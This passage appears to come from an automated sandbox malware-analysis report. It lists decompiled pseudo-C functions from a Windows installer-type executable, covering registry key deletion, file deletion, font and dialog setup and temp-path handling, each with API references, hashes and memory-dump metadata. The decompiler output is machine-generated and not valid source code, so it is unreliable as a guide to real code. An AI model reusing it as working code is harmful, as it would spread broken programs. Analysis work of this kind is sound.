						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                0x004027df
                0x004027e1
                0x004027ed
                0x004027f0
                0x004027fa
                0x004027fe
                0x004027fe
                0x00402804
                0x00402811
                0x00402819
                0x0040281c
                0x00402822
                0x00402830
                0x00402835
                0x00402839
                0x0040283c
                0x00402845
                0x00402851
                0x00402855
                0x00402858
                0x00402862
                0x00402887
                0x00402869
                0x0040286e
                0x00402876
                0x0040287c
                0x00402881
                0x00402881
                0x0040288e
                0x0040288e
                0x0040289b
                0x004028a1
                0x004028b3
                0x004028b3
                0x004028b9
                0x004028b9
                0x004028c4
                0x004028c5
                0x004028c9
                0x004028cd
                0x004028d3
                0x004028d3
                0x004028da
                0x004022dd
                0x00402a5d
                0x00402a69

                APIs
                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                • GlobalFree.KERNEL32 ref: 0040288E
                • GlobalFree.KERNEL32 ref: 004028A1
                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Global$AllocFree$CloseDeleteFileHandle
                • String ID:
                • API String ID: 2667972263-0
                • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                Download Yara Rule
                C-Code - Quality: 48%
                			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406500(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                0x00402cdb
                0x00402ce4
                0x00402ced
                0x00402cf9
                0x00402d02
                0x00402d0c
                0x00402d31
                0x00402d37
                0x00402d3c
                0x00402d3d
                0x00402d6d
                0x00402d46
                0x00402d48
                0x00402d98
                0x00402d9b
                0x00000000
                0x00402da1
                0x00402d57
                0x00402d5c
                0x00402d5e
                0x00000000
                0x00000000
                0x00402d66
                0x00402d6b
                0x00402d6c
                0x00402d6c
                0x00402d79
                0x00402d81
                0x00402d88
                0x00000000
                0x00402db1
                0x00000000
                0x00402d90
                0x00402d1c
                0x00402d2f
                0x00000000
                0x00000000
                0x00000000
                0x00402d2f
                0x00402db7

                APIs
                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseEnum$DeleteValue
                • String ID:
                • API String ID: 1354259210-0
                • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                0x00401d65
                0x00401d69
                0x00401d7e
                0x00401d6b
                0x00401d6d
                0x00401d73
                0x00401d73
                0x00401d84
                0x00401d87
                0x00401d91
                0x00401d94
                0x00401d9c
                0x00401dad
                0x00401db0
                0x00401dbb
                0x00401db2
                0x00401db4
                0x00401db4
                0x00401dbf
                0x00401dcc
                0x00401df3
                0x00401e02
                0x00401e10
                0x00401e18
                0x00401e20
                0x00401e20
                0x00401e29
                0x00401e2f
                0x004029a5
                0x004029a5
                0x00402a5d
                0x00402a69

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                • String ID:
                • API String ID: 1849352358-0
                • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 73%
                			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b848 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b84f = 1;
				 *0x40b84c = _t15 & 0x00000001;
				 *0x40b84d = _t15 & 0x00000002;
				 *0x40b84e = _t15 & 0x00000004;
				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b838);
				_push(_t18);
				_push(_t33);
				E00406055();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                0x00401e35
                0x00401e40
                0x00401e42
                0x00401e4f
                0x00401e66
                0x00401e6b
                0x00401e78
                0x00401e7d
                0x00401e81
                0x00401e8c
                0x00401e93
                0x00401ea5
                0x00401eab
                0x00401eb0
                0x00401eba
                0x00402620
                0x00401569
                0x004029a5
                0x00402a5d
                0x00402a69

                APIs
                • GetDC.USER32(?), ref: 00401E38
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                • ReleaseDC.USER32 ref: 00401E6B
                • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CapsCreateDeviceFontIndirectRelease
                • String ID:
                • API String ID: 3808545654-0
                • Opcode ID: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                • Opcode Fuzzy Hash: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                0x00401c2e
                0x00401c30
                0x00401c37
                0x00401c3a
                0x00401c3d
                0x00401c47
                0x00401c4b
                0x00401c4e
                0x00401c57
                0x00401c57
                0x00401c5a
                0x00401c5e
                0x00401c67
                0x00401c67
                0x00401c6a
                0x00401c6e
                0x00401c70
                0x00401cc5
                0x00401cc7
                0x00401cd0
                0x00401cd8
                0x00401cdb
                0x00401cdb
                0x00401ce4
                0x00000000
                0x00401c72
                0x00401c79
                0x00401c7b
                0x00401c7e
                0x00401c84
                0x00401c8b
                0x00401c8e
                0x00401cb6
                0x00401cea
                0x00401cea
                0x00401c90
                0x00401c9e
                0x00401ca6
                0x00401ca9
                0x00401ca9
                0x00401c8e
                0x00401ced
                0x00401cf0
                0x00401cf6
                0x004029a5
                0x004029a5
                0x00402a5d
                0x00402a69

                APIs
                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                • SendMessageA.USER32 ref: 00401CB6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Timeout
                • String ID: !
                • API String ID: 1777923405-2657877971
                • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004049C4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
			}



















                0x004049ca
                0x004049cf
                0x004049d7
                0x004049d8
                0x004049e5
                0x004049ed
                0x004049ee
                0x004049f0
                0x004049f2
                0x004049f4
                0x004049f7
                0x004049f7
                0x004049fe
                0x00404a04
                0x00404a04
                0x00404a0b
                0x00404a12
                0x00404a15
                0x00404a18
                0x00404a18
                0x00404a1c
                0x00404a2c
                0x00404a2e
                0x00404a31
                0x004049da
                0x004049da
                0x004049e1
                0x004049e1
                0x00404a39
                0x00404a44
                0x00404a5a
                0x00404a6a
                0x00404a86

                APIs
                • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                • wsprintfA.USER32 ref: 00404A6A
                • SetDlgItemTextA.USER32 ref: 00404A7D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ItemTextlstrlenwsprintf
                • String ID: %u.%u%s%s
                • API String ID: 3540041739-3551169577
                • Opcode ID: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                • Opcode Fuzzy Hash: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405A8F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405A8F(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                0x00405a90
                0x00405aa7
                0x00405aaf
                0x00405aaf
                0x00405ab7

                APIs
                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 2659869361-823278215
                • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402E3D, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402E3D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x429448 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x42f430) {
							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
							 *0x429448 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040653C(0);
					}
				} else {
					_t6 =  *0x429448;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x429448 = 0;
					return _t6;
				}
			}






                0x00402e44
                0x00402e64
                0x00402e6e
                0x00402e7a
                0x00402e8b
                0x00402e94
                0x00000000
                0x00402e99
                0x00402ea0
                0x00402e66
                0x00402e6d
                0x00402e6d
                0x00402e46
                0x00402e46
                0x00402e4d
                0x00402e50
                0x00402e50
                0x00402e56
                0x00402e5d
                0x00402e5d

                APIs
                • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                • GetTickCount.KERNEL32 ref: 00402E6E
                • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$CountCreateDestroyDialogParamShowTick
                • String ID:
                • API String ID: 2102729457-0
                • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405B7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                Download Yara Rule
                C-Code - Quality: 53%
                			E00405B7D(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E004060F7(0x42bc98, _a4);
				_t21 = E00405B28(0x42bc98);
				if(_t21 != 0) {
					E004063D2(_t21);
					if(( *0x42f43c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc98;
						while(1) {
							_t11 = lstrlenA(0x42bc98);
							_push(0x42bc98);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040646B();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405AD6(0x42bc98);
								continue;
							} else {
								goto L1;
							}
						}
						E00405A8F();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                0x00405b89
                0x00405b94
                0x00405b98
                0x00405b9f
                0x00405bab
                0x00405bb7
                0x00405bb7
                0x00405bcf
                0x00405bd0
                0x00405bd7
                0x00405bd8
                0x00000000
                0x00000000
                0x00405bbb
                0x00405bc2
                0x00405bca
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405bc2
                0x00405bda
                0x00000000
                0x00405bee
                0x00405bad
                0x00405bb1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405bb1
                0x00405b9a
                0x00000000

                APIs
